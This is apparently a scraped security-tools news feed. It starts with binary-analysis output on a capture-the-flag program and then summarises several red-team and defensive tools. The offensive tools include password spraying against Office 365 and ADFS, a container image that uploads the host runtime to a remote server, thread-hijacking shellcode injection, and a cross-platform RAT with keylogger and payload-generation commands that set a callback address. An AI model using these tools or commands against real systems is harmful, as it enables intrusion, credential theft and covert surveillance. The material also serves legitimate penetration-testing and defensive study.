_start : 0x10c0
main : 0x11d6

***************************************************************************

> POSSIBLE USER DEFINED FUNCTIONS :

win : 0x11a9
main : 0x11d6

***************************************************************************

> ASSEMBLY AND DECOMPILED CODE :


[*] ASM - win :

β”Œ 45: sym.win ();
β”‚ 0x000011a9 f30f1efa endbr64
β”‚ 0x000011ad 55 push rbp
β”‚ 0x000011ae 4889e5 mov rbp, rsp
β”‚ 0x000011b1 488d3d500e00. lea rdi, str.You_have_bypassed_this_function ; 0x2008 ; "You have bypassed this function" ; const char *format
β”‚ 0x000011b8 b800000000 mov eax, 0
β”‚ 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format)
β”‚ 0x000011c2 488d3d5f0e00. lea rdi, str.cat_flag.txt ; 0x2028 ; "cat flag.txt" ; const char *string
β”‚ 0x000011c9 b800000000 mov eax, 0
β”‚ 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)
β”‚ 0x000011d3 90 nop
β”‚ 0x000011d4 5d pop rbp
β”” 0x000011d5 c3 ret

[*] DECOMPILED CODE - win :

void sym.win(void)

{
sym.imp.printf("You have bypassed this function");
sym.imp.system("cat flag.txt");
return;
}

[*] ASM - main :

; DATA XREF from entry0 @ 0x10e1
β”Œ 77: int main (int argc, char **argv, char **envp);
β”‚ ; var char *s @ rbp-0x40
β”‚ 0x000011d6 f30f1efa endbr64
β”‚ 0x000011da 55 push rbp
β”‚ 0x000011db 4889e5 mov rbp, rsp
β”‚ 0x000011de 4883ec40 sub rsp, 0x40
β”‚ 0x000011e2 488d3d4c0e00. lea rdi, str.Enter_your_name ; 0x2035 ; "Enter your name" ; const char *s
β”‚ 0x000011e9 e892feffff call sym.imp.puts ; int puts(const char *s)
β”‚ 0x000011ee 488d45c0 lea rax, [s]
β”‚ 0x000011f2 4889c7 mov rdi, rax ; char *s
β”‚ 0x000011f5 b800000000 mov eax, 0
β”‚ 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)
β”‚ 0x000011ff 488d3d3f0e00. lea rdi, str.Your_name_is_ ; 0x2045 ; "Your name is " ; const char *format
β”‚ 0x00001206 b800000000 mov eax, 0
β”‚ 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)
β”‚ 0x00001210 488d45c0 lea rax, [s]
β”‚ 0x00001214 4889c7 mov rdi, rax ; const char *s
β”‚ 0x00001217 e864feffff call sym.imp.puts ; int puts(const char *s)
β”‚ 0x 0000121c b800000000 mov eax, 0
β”‚ 0x00001221 c9 leave
β”” 0x00001222 c3 ret

[*] DECOMPILED CODE - main :

// WARNING: [r2ghidra] Failed to match type char * for variable s to Decompiler type:

undefined8 main(void)

{
undefined8 s;

sym.imp.puts("Enter your name");
sym.imp.gets(&s);
sym.imp.printf("Your name is ");
sym.imp.puts(&s);
return 0;
}

***************************************************************************

> VULNERABLE FUNCTIONS :

Possible vulnerability locations - Command Execution

0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)

Possible vulnerability locations - Format String

0x000011bd e8defeffff call sym.imp.printf ; int printf(const char * format)
0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)

Possible vulnerability locations - Buffer Overflow

0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)


***************************************************************************

You can also pass arguments and get the info based on your needs,

[email protected]:~/elfxtract$ python3 main.py -h

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************
usage: main.py [-h] -f FILE [-a] [-i] [-g] [--user-func] [--get-func GET_FUNC] [--asm-only]
[--decompiled-only] [-t]

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Path of the ELF
-a, --all Extract all info
-i, --info Displays bas ic info
-g, --gadgets Displays gadgets
--user-func Displays the details of user defined functions
--get-func GET_FUNC Displays the ASM & decompiled code of the given function
--asm-only Displays the ASM of ELF
--decompiled-only Displays the decompiled C code of ELF
-t, --tables Displays PLT, GOT & Function table

Updates

elfxtract is fully developed for parsing PWN binaries,

Soon, it will be added with new features to analyse system binaries

And also, auto-BOF and auto-ret2 exploit features will be added



goEnumBruteSpray - User Enumeration And Password Bruteforce On Azure, ADFS, OWA, O365 And Gather Emails On Linkedin

26 November 2021 at 11:30
By: Zion3R


The recommended module is o365 for user enumeration and passwords bruteforce / spray . Additional information can be retrieved to avoid account lockout, to know that the password is good but expired, MFA enabled,...


Linkedin

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company will be searched on Linkedin and all people working at these companies will be returned in the specified format.

The Linkedin's session cookie li_at is required.


SearchEngine

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company name will be searched on Google and Bing with a dork to find people working in the company (site:linkedin.com/in+"%s"). The results title will be parsed to output email addresses in the specified format.



Azure

User enumeration

The Azure module is only available to enumerate the users of a tenant. The authentication request will be made on https://autologon.microsoftazuread-sso.com, a detailed response shows if the account does not exist, a MFA is required, if the account is locked, ...



ADFS

Passwords bruteforce / spray

The ADFS module is only available to bruteforce or spray a password. The authentication request is sent to https://<target>/adfs/ls/idpinitiatedsignon.aspx?client-request-id=<randomGUID>&pullStatus=0. An error message can informs the user if the password is expired


Β 

O365

This module allows to enumerate users and bruteforce / spray passwords.

User enumeration

Several modes are available: office, oauth2 and onedrive (not implemented yet). The office mode is recommended as no authentication is made. Oauth2 can retrieve additional information through AADSTS error code (MFA enable, locked account, disabled account)



Passwords bruteforce / spray

As for the user enumeration, two modes are available: oauth2 and autodiscover (not implemented yet). The Oauth2 is the recommended mode, it allows to get much information thanks to the AADSTS error code.



OWA

This module allows to enumerate users and bruteforce / spray passwords.

User enumeration

Enumeration is made with authentication requests. Authentication for a non-existent user will take longer than for a valid user. At first, the average response time for an invalid user will be calculated and then the response time for each authentication request will be compared.



Passwords bruteforce / spray

Please note that no account locking mechanism can be implemented because no information about it is returned.



Credits

https://github.com/busterb/msmailprobehttps://github.com/0xZDH/o365spray/https://github.com/xFreed0m/ADFSpray/https://github.com/m8r0wn/CrossLinked



Nanobrok - Web Service For Control And Protect Your Android Device Remotely

25 November 2021 at 20:30
By: Zion3R


Web Service write in Python for control and protect your android device remotely.Β 

The official app can be found on the PlayStore:


Overview

Nanobrok-Server is powerful opensource webservice for control and protect your android device, written in Python, that allow and offer a stable and security connection with your android device for protect , control remotely.

Main Features

  • Maps the location of your device
  • Alert flag (Event it's lost or stolen)
  • Recorder Audio Mic
  • Remote File Transfer [PRO]
  • Network scanner [PRO]
  • and more!

Security features

We implemented some security features for try protect your remote server. But remember that no method of transmission over the internet, or method of electronic storage is 100% secure and reliable, and I cannot guarantee its absolute security.

  • CSRF token
  • Sign-in attempt block limit
  • X-Frame-Options
  • Same origin policy (SOP)
  • CORS flask implementation
  • HTTPS force redirect
  • API Header X-CSRFToken
  • Self Signed Certificate (CA)

we are always looking to implement security features.

Supported platforms

  • Python: you need Python 3.7 or later to run Nanobrok-Server.

  • You can run localhost, VPS or as heroku app.

  • Operating System:

    • a recent version of Linux (we tested on Ubuntu 18.04 LTS);
    • please note: Windows is supported (was not tested yet)

Installation & Documentation

Learn more about using wiki

Contributing

See CONTRIBUTING.md for how to help out.

community

on discord: https://discord.gg/gYjBryBu

License

Nanobrok is licensed under the Apche 2.0.

Made with by P0cL4bs Team


LOLBins - PyQT5 App For LOLBAS And GTFOBins

25 November 2021 at 11:30
By: Zion3R


PyQT app to list all Living Off The Land Binaries and Scripts for Windows from LOLBAS and Unix binaries that can be used to bypass local security restrictions in misconfigured systems from GTFOBins.

Widnows


Linux



Redherd Framework -A Collaborative And Serverless Framework For Orchestrating A Geographically Distributed Group Of Assets

24 November 2021 at 20:30
By: Zion3R


RedHerd is a collaborative and serverless framework for orchestrating a geographically distributed group of assets capable of conducting simulating complex offensive cyberspace operations.

Getting Started

Take a look at the RedHerd documentation for instructions on how to getting started with the framework.

Cite this work

If you use RedHerd Framework for your research activity, cite the following paper published by MDPI (Multidisciplinary Digital Publishing Institute) https://www.mdpi.com/2624-6120/2/4/38

Links

Hereafter, some interesting links referred to the project:

Changelog

Go to CHANGELOG to see all the version changes.

License

This project is under the MIT license.

Contact us

Feel free to contact us at this e-mail address:


Disclaimer

The provided contents and tools are for awareness and research purposes only. Our target audience is composed of those interested in learning about Ethical Hacking, Security, Penetration Testing and Red Teaming. We are not responsible for any inappropriate or illegal usage of both proposed material and discussed topics.

Funding

This is a non-profit project which received neither funding nor sponsorship.



Whoc - A Container Image That Extracts The Underlying Container Runtime

24 November 2021 at 11:30
By: Zion3R


A container image that extracts the underlying container runtime and sends it to a remote server. Poke at the underlying container runtime of your favorite CSP container platform!


How does it work?

As shown by runc CVE-2019-5736, traditional Linux container runtimes expose themselves to the containers they're running through /proc/self/exe. whoc uses this link to read the container runtime executing it.


Dynamic Mode

This is whoc default mode that works against dynamically linked container runtimes.

  1. The whoc image entrypoint is set to /proc/self/exe, and the image's dynamic linker (ld.so) is replaced with fake_ld.
  2. Once the image is run, the container runtime re-executes itself inside the container.
  3. Given the runtime is dynamically linked, the kernel loads our fake dynamic linker to the runtime process and passes execution to it.
  4. fake_ld obtains a file descriptor for the runtime binary by opening /proc/self/exe, and executes upload_runtime.
  5. upload_runtime reads the runtime binary from /proc/self/fd/<runtime-fd> and sends it to the configured remote server.



Wait-For-Exec Mode

For statically linked container runtimes, whoc comes in another flavor: whoc:waitforexec.

  1. upload_runtime is the image entrypoint, and runs as the whoc container PID 1.
  2. The user is expected to exec into the whoc container and invoke a file pointing to /proc/self/exe (e.g. docker exec whoc-ctr /proc/self/exe)
  3. Once the exec occurs, the container runtime re-executes itself inside the container
  4. upload_runtime reads the runtime binary through /proc/<runtime-pid>/exe and sends it to the configured remote server



Try Locally

You'll need docker and python3 installed. Clone the repository:

$ git clone [email protected]:twistlock/whoc.git

Set up a file server to receive the extracted container runtime:

$ cd whoc
$ mkdir -p stash && cd stash
$ ln -s ../util/fileserver.py fileserver
$ ./fileserver

From another shell, run the whoc image in your container environment of choice, for example Docker:

$ cd whoc
$ docker build -f Dockerfile_dynamic -t whoc:latest src # or ./util/build.sh
$ docker run --rm -it --net=host whoc:latest 127.0.0.1 # or ./util/run_local.sh

See that the file server received the container runtime. Since we run whoc under vanilla Docker, the received container runtime should be runc.

--net=host is only used in local tests so that the whoc container could easily reach the fileserver on the host via 127.0.0.1.


Help

Help for whoc's main binary, upload_runtime:

Usage: upload_runtime [options] <server_ip>

Options:
-p, --port Port of remote server, defaults to 8080
-e, --exec Wait-for-exec mode for static container runtimes, waits until an exec to the container occurred
-b, --exec-bin In exec mode, overrides the default binary created for the exec, default is /bin/enter
-a, --exec-extra-argument In exec mode, pass an additional argument to the runtime so it won't exit quickly
-r, --exec-readdir-proc In exec mode, instead of guessing the runtime pid (which gives whoc one shot of catching the runtime),
find the runtime by searching for new processes under '/proc'


Whispers - Identify Hardcoded Secrets In Static Structured Text

23 November 2021 at 20:30
By: Zion3R


"My little birds are everywhere, even in the North, they whisper to me the strangest stories." - Lord Varys

Whispers is a static code analysis tool designed for parsing various common data formats in search of hardcoded credentials and dangerous functions. Whispers can run in the CLI or you can integrate it in your CI/CD pipeline.


Detects
  • Passwords
  • API tokens
  • AWS keys
  • Private keys
  • Hashed credentials
  • Authentication tokens
  • Dangerous functions
  • Sensitive files

Supported Formats

Whispers is intended to be a structured text parser, not a code parser.

The following commonly used formats are currently supported:

  • YAML
  • JSON
  • XML
  • .npmrc
  • .pypirc
  • .htpasswd
  • .properties
  • pip.conf
  • conf / ini
  • Dockerfile
  • Dockercfg
  • Shell scripts
  • Python3

Python3 files are parsed as ASTs because of native language support.


Declaration & Assignment Formats

The following language files are parsed as text, and checked for common variable declaration and assignment patterns:

  • JavaScript
  • Java
  • Go
  • PHP

Special Formats
  • AWS credentials files
  • JDBC connection strings
  • Jenkins config files
  • SpringFramework Beans config files
  • Java Properties files
  • Dockercfg private registry auth files
  • Github tokens

Installation

From PyPI
pip3 install whispers

From GitHub
git clone https://github.com/Skyscanner/whispers
cd whispers
make install

Usage

CLI
whispers --help
whispers --info
whispers source/code/fileOrDir
whispers --config config.yml source/code/fileOrDir
whispers --output /tmp/secrets.yml source/code/fileOrDir
whispers --rules aws-id,aws-secret source/code/fileOrDir
whispers --severity BLOCKER,CRITICAL source/code/fileOrDir
whispers --exitcode 7 source/code/fileOrDir

Python
from whispers.cli import parse_args
from whispers.core import run

src = "tests/fixtures"
configfile = "whispers/config.yml"
args = parse_args(["-c", configfile, src])
for secret in run(args):
print(secret)

Config

There are several configuration options available in Whispers. It’s possible to include/exclude results based on file path, key, or value. File path specifications are interpreted as globs. Keys and values accept regular expressions and several other parameters. There is a default configuration file built-in that will be used if you don't provide a custom one.

config.yml should have the following structure:

include:
files:
- "**/*.yml"

exclude:
files:
- "**/test/**/*"
- "**/tests/**/*"
keys:
- ^foo
values:
- bar$

rules:
starks:
message: Whispers from the North
severity: CRITICAL
value:
regex: (Aria|Ned) Stark
ignorecase: True

The fastest way to tweak detection (ie: remove false positives and unwanted results) is to copy the default config.yml into a new file, adapt it, and pass it as an argument to Whispers.

whispers --config config.yml --rules starks src/file/or/dir


Custom Rules

Rules specify the actual things that should be pulled out from key-value pairs. There are several common ones that come built-in, such as AWS keys and passwords, but the tool is made to be easily expandable with new rules.

  • Custom rules can be defined in the main config file under rules:
  • Custom rules can be added to whispers/rules
rule-id:  # unique rule name
description: Values formatted like AWS Session Token
message: AWS Session Token # report will show this message
severity: BLOCKER # one of BLOCKER, CRITICAL, MAJOR, MINOR, INFO

key: # specify key format
regex: (aws.?session.?token)?
ignorecase: True # case-insensitive matching

value: # specify value format
regex: ^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9\+\/]{270,450}$
ignorecase: False # case-sensitive matching
minlen: 270 # value is at least this long
isBase64: True # value is base64-encoded
isAscii: False # value is binary data when decoded
isUri: False # value is not formatted like a URI

similar: 0.35 # maximum allowed similarity between key and value
# (1.0 being exactly the same)

Plugins

All parsing functionality is implemented via plugins. Each plugin implements a class with the pairs() method that runs through files and returns the key-value pairs to be checked with rules.

class PluginName:
def pairs(self, file):
yield "key", "value"


UDP-Hunter - Network Assessment Tool For Various UDP Services Covering Both IPv4 And IPv6 Protocols

23 November 2021 at 11:30
By: Zion3R


UDP Scanning has always been a slow and painful exercise, and if you add IPv6 on top of UDP, the tool choices get pretty limited. UDP Hunter is a python based open source network assessment tool focused on UDP Service Scanning. With UDP Hunter, we have focused on providing auditing of widely known UDP protocols for IPv6 and IPv4 hosts. As of today, UDP Hunter supports 19 different service probes. The tool allows you to do bulk scanning of large networks as well as targeted host scanning for specific ports and more. Once an open service is discovered, UDP Hunter takes it one step further and even provides you guidance on how you can possibly exploit the discovered services. UDP Hunter provides reports in a neat text format, however, support for more formats is under way.


How does UDP Hunter work?

UDP Hunter creates a list of IPs when any IP range is provided to it. It also supports domain names which will be resolved and the IP will be added to the list. Once the list has been created internally by UDP Hunter, it will send UDP probes to all listed IPs. If the host is running a UDP service, it will respond. UDP Hunter basically sniffs network particularly for UDP traffic, then reads all UDP packets coming to the target host. All UDP probes received after running UDP Hunter will be reported. However, there is an option (by setting --noise=false) to ignore irrelevant UDP packets and only observe the UDP traffic of interest originated from the hosts and services/ports which are mentioned in the target list. The idea behind creating UDP Hunter was initially inspired by udp-proto-scanner. I heartily thank Portcullis Labs for it and also Anant and Sumit Siddharth(Sid) for their valuable inputs while working on UDP Hunter.


Supported UDP Probes:

As of today, we support the following UDP service probes on their default ports:

  • ike - 500 port
  • rpc / RPCCheck - 111 port
  • ntp / NTPRequest - 123 port
  • snmp-public / SNMPv3GetRequest - 161 port
  • ms-sql / ms-sql-slam - 1434 port
  • netop - 6502 port
  • tftp - 69 port
  • db2 - 523 port
  • citrix - 1604 port
  • echo - 7 port
  • chargen - 19 port
  • systat - 11 port
  • daytime / time - 13 port
  • DNSStatusRequest / DNSVersionBindReq - 53 port
  • NBTStat - 137 port
  • xdmcp - 177 port
  • net-support - 5405 port
  • mdns-zeroconf - 5353 port
  • gtpv1 - 2123 port

Setup:

Download the tool from here or Clone the repository:

git clone https://github.com/NotSoSecure/udp-hunter


Requirements:
  • Python 3.x
  • Python Modules - also mentioned in β€œrequirements.txt” file
    • netaddr
    • colorama
    • argparse
    • ifaddr
    • datetime

This should help you with the initial setup:

Install all required modules: pip3 install -r requirements.txt


Configuration files required:
  • udp.txt - This file contains UDP probes
  • udphelp.txt - This file contains list of tools, suggestions for each UDP probes or services

You can also change configuration files by using command line argument:

β€œ--configfile ” and β€œ--probehelp ”


Verify the configurations by running following command:

python udp-hunter.py

Note: It should display following help details, if this throws any error check your configurations or connect with me for any tool specific errors.


Features / Options:

UDP Hunter v0.1beta has the following features:

Mandatory Options:
  • --host - Single Host - Required or
  • --file - File of ips - Required

Optional:
  • --output - Output file - Required
  • --probes - Name of probe or 'all' (default: all probes) (Optional)
    • Probe list - ike, rpc, ntp, snmp-public, ms-sql, ms-sql-slam, netop, tftp, db2, citrix, echo, chargen, systat, daytime, time, RPCCheck, DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, SNMPv3GetRequest, xdmcp, net-support, mdns-zeroconf, gtpv1
  • --ports - List of ports or 'all' (default: all ports) (Optional)
  • --retries - Number of packets to send to each host. Default 2 (Optional)
  • --noise - To filter output from non-listed IPs (Optional)
  • --verbose - verbosity, will show sniffer output also --- please keep this a true, by default this is true. This will help us to analyze output.
  • --timeout - Timeout 1.0, 2.0 in minutes (Optional)
  • --lhost6 - Provide IPv6 of listner interface
  • --lhost4 - Provide IPv4 of listner interface
  • --configfile - Configuration file location - default is 'udp.txt' in same directory
  • --probehelp - Help file location - default is 'udphelp.txt' in same directory

Usage:

Usage: python udp-hunter.py --file=inputfile.txt --output=outputfile.txt [optional arguments] Usage: python udp-hunter.py --file=inputfile.txt --output=outputfile.txt [--probes=NTPRequest,SNMPv3GetReques] [--ports=123,161,53] [--retries=3] [--noise=true] [--verbose=false] [--timeout=1.0] [--configfile]


Credits:

The UDP probes are mainly taken from amap, ike-scan, nmap and udp-proto-scanner. Inspiration for the scanning code was drawn from udp-proto-scanner.


Future Work:
  • Addition of more UDP probes
  • Different reporting formats
  • Update exploitation-related helps

Read More:


ThreatBox - A Standard And Controlled Linux Based Attack Platform

22 November 2021 at 20:30
By: Zion3R


ThreatBox is a standard and controlled Linux based attack platform. I've used a version of this for years. It started as a collection of scripts, lived as a rolling virtual machine, existed as code to build a Linux ISO, and has now been converted to a set of ansible playbooks. Why Ansible? Why not? This seemed to be the next natural evolution to the configuration of standard attack platforms.

This project uses ansible playbooks and roles to perform post deployment configuration on a linux target (Tested on Ubuntu 18.04).

The project is designed to be used as a starter process in creating, managing, and using a standard attack platform for red teaming or penetration testing.

Detail on the concept of a Standard Attack Platform can be found it the book Red Team Development and Operations - A practical guide, written by Joe Vest and James Tubberville.Β 


Features
  • Standard tools defined as ansible roles
  • Customizations designed to make security testing easier
  • Variable list to add or remove git repositories, OS packages, or python modules. (threatbox.yml)
  • Version tracking of the deployed instance version and the deploy tool version. This is helpful it meeting compliance rules and can help minimize fear by actively tracking all tools.
    • Threatbox version created at deployment and displayed in desktop wallpaper
    • Deployed software tracked in ~/Desktop/readme
  • SSH port auto-switching. The deployment starts on port 22, but reconfigures the target system to the desired SSH port using the ansible_port variable in threatbox.yml
  • Download and compile several .net toolkits (i.e. SeatBelt.exe from Ghostpack https://github.com/GhostPack/Seatbelt)
  • Most python projects installed using pipenv. Use pipenv shell in the project directory to access. See https://realpython.com/pipenv-guide/ for pipenv usage guidance

Project Files

The following list highlights key components of this project.

File/Directory Description Usage
host Ansible hosts file Update with IP addresses of target ansible systems
group_vars/threatbox.yml common variables variable used for the project. update as needed.
threatbox_playbox.yml Primary ansible playbook Update as need to add additional roles or features
roles/common Common OS platform configuration Setup common OS settings (i.e set version in background or build)
roles/. other specific roles to configure or deploy tools add or modify roles in roles/

Quickstart

Provision

Provision one or more targets.

Note: This project was tested on Ubuntu 18.04 deployed in Digitalocean


Configuration
  1. Copy hosts.sample to hosts
  2. Edit hosts with the IP(s) of your target systems
  3. Copy group_vars\threatbox.yml.sample to group_vars\threatbox.yml
  4. Edit group_vars\threatbox.yml with the updated variables you would like to use
    • Don't forget to update SSH key with a key that has access to the remote target

Ansible commands
# OSX issue https://github.com/ansible/ansible/issues/32499
if [[ "$(uname)" == "Darwin" ]]
then
export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=yes;
fi

# Ansible Logging
rm ./ansible.log
export ANSIBLE_LOG_PATH="ansible.log"

# Ansible Debugging
export ANSIBLE_DEBUG=False

# Execute playbook
ansible-playbook -e ansible_python_interpreter=/usr/bin/python3 -i hosts threatbox_playbook.yml

Note: Consider using Mitogen for Ansible to gain a significant performance boost. https://mitogen.networkgenomics.com/ansible_detailed.html


Tested with this ansible.cfg
[defaults]
host_key_checking = False
pipelining = True
forks = 100
timeout = 600
stdout_callback = yaml
bin_ansible_callbacks = True
callback_whitelist = profile_roles, profile_tasks, timer

#mitogen
strategy_plugins = ~/Documents/mitogen-0.2.9/ansible_mitogen/plugins/strategy
strategy = mitogen_linear

Remotely Access the system

Console access with SSH

Note: SSH may be set to a non-standard port during setup. This value is set in the group_vars/threatbox.yml files

threatboxip=10.10.10.10
sshport=52222
ssh -p $sshport -i ~/.ssh/threatbox_id_rsa [email protected]$threatboxip

GUI Access with VNC over SSH

Note: VNC is setup but not allowed over the network. You must use an SSH tunnel to access.

threatboxip=10.10.10.10
sshport=52222
ssh -p $sshport -i ~/.ssh/threatbox_id_rsa -L 5901:localhost:5901 [email protected]$threatboxip

Notes on the project

This project uses ansbile roles. These roles may not exactly follow the ansible style. They were designed to be used as part of this project and use a single 'variable' file to control the project. The roles can easily be used in other project with minor tweaks.


Features

ThreatBox Custom Commands


Tool Categories


Tracking of all installed tools


Automatic terminal logging


Custom terminal options provide more context


Light version of the terminalΒ 

Pipenv keep Python projects independent


Example of SilentTrinity running in pipenv environment



ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shell-code Into A Standard Win32 Application

22 November 2021 at 11:30
By: Zion3R


Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.


About

I developed this small project to continue my experiences of different code injection methods and to allow RedTeam security professionals to utilize this method as a unique way to perform software penetration testing. With Thread hijacking, it allows the hijacker.exe program to susepend a thread within the target.exe program allowing us to write shellcode to that target thread, and later be executed (via; WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()).


Example GIF (Credits To Endgame)



Usage
int main()
{
System sys;
Interceptor incp;
Exception exp;

sys.returnVersionState();
if (sys.returnPrivilegeEscalationState())
{
std::cout << "Token Privileges Adjusted\n";
}

if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
{
incp.ExecuteWin32Shellcode(m_procId);
}

system("PAUSE");
return 0;
}

For Further Information On Thread Execution Hijacking

Click On The Link Below

https://capec.mitre.org/data/definitions/30.html


Environment
  • Windows Vista+
  • Visual C++

Libs
  • Winapi

    • user32.dll
    • kernel32.dll
  • ntdll.dll


Ethical Notice

This code was simply written to demonstrate an overlooked method to inject shellcode or a DLL into a Win32 program. This code is not to be used for malicous purposes. The author, Josh Schiavone, is not liable for misuse of this software. May God bless you all.



Stacs - Static Token And Credential Scanner

21 November 2021 at 20:30
By: Zion3R


Static Token And Credential Scanner


What is it?

STACS is a YARA powered static credential scanner which suports binary file formats, analysis of nested archives, composable rulesets and ignore lists, and SARIF reporting.


What does STACS support?

Currently, STACS supports recursive unpacking of tarballs, gzips, bzips, zips, and xz files. As STACS works on detected file types, rather than the filename, propriatary file formats based on these types are automatically supported (such as Docker images, Android APKs, and Java JAR fles).


Who should use STACS?

STACS is designed for use by any teams who release binary artifacts. STACS provides developers the ability to automatically check for accidental inclusion of static credentials and key material in their releases.

However, this doesn't mean STACS can't help with SaaS applications, enterprise software, or even source code!

As an example, STACS can be used to find static credentials in Docker images uploaded to public and private container registries. It can also be used to find credentials accidentally compiled in to executables, packages for mobile devices, and "enterprise archives" - such as those used by Java application servers.


How does it work?

STACS detects static credentials using "rule packs" provided to STACS when run. These rule packs define a set of YARA rules to run against files provided to STACS. When a match against a rule is found, a "finding" is generated. These findings represent potential credentials inside of a file, and are reported on for a developer to remediate or "ignore".

If the finding is found to be a false positive - that is, a match on something other than a real credential - the developer can generate a set of "ignore lists" to ensure that these matches don't appear in future reports.

The real power from STACS comes from the automatic detection and unpacking of nested archives, and composable ignore lists and rule packs.


Ignore lists?

In order to allow flexible and collaborative usage, STACS supports composable ignore lists. This allows for an ignore list to include other ignore lists which enable composition of a "tree of ignores" based on organisational guidelines. These ignore lists are especially useful in organisations where many of the same frameworks or products are used. If a team has already marked a finding as a false positive, other teams get the benefit of not having to triage the same finding.


Rule packs?

In the same manner as ignore lists, rule packs are also composable. This enables an organisation to define a baseline set of rules for use by all teams, while still allowing teams to maintain rulesets specific to their products.


How do I use it?

The easiest way to use STACS is using the Docker images published to Docker Hub. However, STACS can also be installed directly from Python's PyPI, or by cloning this repository. See the relevant sections below to get started!

A cloud based service is coming soon which allows integration directly in build and release pipelines to enable detection of static credentials before release!


Docker

Using the published images, STACS can be used to scan artifacts right away! The STACS Docker images provides a number of volume mounts for files wanted to be scanned to be mounted directly into the scan container.

As an example, to scan everything in the current folder, the following command can be run (Docker must be installed).

docker run \
--rm \
--mount type=bind,source=$(pwd),target=/mnt/stacs/input \
stacscan/stacs:latest

By default, STACS will output any findings in SARIF format directly to STDOUT and in order to keep things orderly, all log messages will be sent to STDERR. For more advanced use cases, a number of other volume mounts are provided. These allow the user to control the rule packs, ignore lists, and a cache directories to use.


PyPi

STACS can also be installed directly from Python's PyPi. This provides a stacs command which can then be used by developers to scan projects directly in their local development environments.

STACS can be installed directly from PyPi using:

pip install stacs

Please Note: The PyPi release of STACS does not come with any rules. These will also need to be cloned from the community rules repositoryfor STACS to work!


FAQ

Is there a hosted version of STACS?

Not yet. However, there are plans for a hosted version of STACS which can be easily integrated into existing build systems, and which contains additional prebuilt rule packs and ignore lists.


What do I do about false positives?

Unfortunately, false positives are an inevitable side effect during the detection of static credentials. If rules are too granular then rule maintenance becomes a burden and STACS may miss credentials. If rules are too coarse then STACS may generate too many false positives!

In order to assist, STACS provides a number of tools to assist with reducing the number of false positives which make it into final reports.

Primarily, STACS provides a mechanism which allows users to define composable ignore lists which allow a set of findings to be "ignored". These rules can be as coarse as ignoring all files based on a pattern, or as granular as a specific finding on a particular line of a file.

This information is automatically propagated through into reports, so "ignored" findings will be marked as "suppressed" in SARIF output while also including the reason for the ignore in the output for tracking.


How do I view the results?

Currently, the only output format is SARIF v2.1.0. There are a number of viewers available which make this data easier to read, such as this great web based viewer from Microsoft. An example of the findings from a Docker container image has been included below:



The performance is really, really bad when running in Docker on macOS!

Unfortunately, this appears to be due to a limitation of Docker Desktop for Mac. I/O for bind mounts is really, really slow.



SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT

21 November 2021 at 11:30
By: Zion3R


A Cross Platform multifunctional (Windows/Linux/Mac) RAT.


Getting Started

Description

A cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.


Features
  • Built-in Shell for command execution
  • Dumping System Information including drives and rams
  • Screenshot module. Captures screenshot of client screen.
  • Connection Loop (Will continue on connecting to server)
  • Currently, it uses BASE64 encoding.
  • Pure Python
  • Cross Platform. (Tested on Linux. Errors are accepted)
  • Source File included for testing
  • Python 3

To be expected in future
  • Stealth Execution
  • Encryption
  • Storing Sessions from last attempt
  • Pushing Notifications when a client connects

Installation

The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:

$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt

Documentation

Generating Payload

You can get the payload file in two ways:

  • Source File
  • Compiled File
The source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source

The compiled version has to generated on the respective platform. For example, you can't generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:

$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer

Β 

Replace your IP Address and Port on above commands.


Running Server

The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn't store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:

$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999

Connections

All the connections will be listed under sessions command:

$ sessions


You can connect to you target session with connect command and launch one of available commands:

keylogger on $ keylogger dump $ screenshot ">
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot


Help

Get a list of available commands:

$ help

Help on a Specific Command:

$ help COMMAND

Support

Twitter: @hash3liZer
Discord: TheFlash2k#0407



Registry-Recon - Cobalt Strike Aggressor Script That Performs System/AV/EDR Recon

20 November 2021 at 20:30
By: Zion3R

Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon.

Author: Jess Hires


Description

As a red-team practitioner, we are often using tools that attempt to fingerprint details about a compromised system, preferably in the most stealthy way possible. Some of our usual tooling for this started getting flagged by EDR products, due to the use of Windows CLI commands. This aggressor script aims to solve that problem by only probing the system using native registry queries, no CLI commands.


Setup

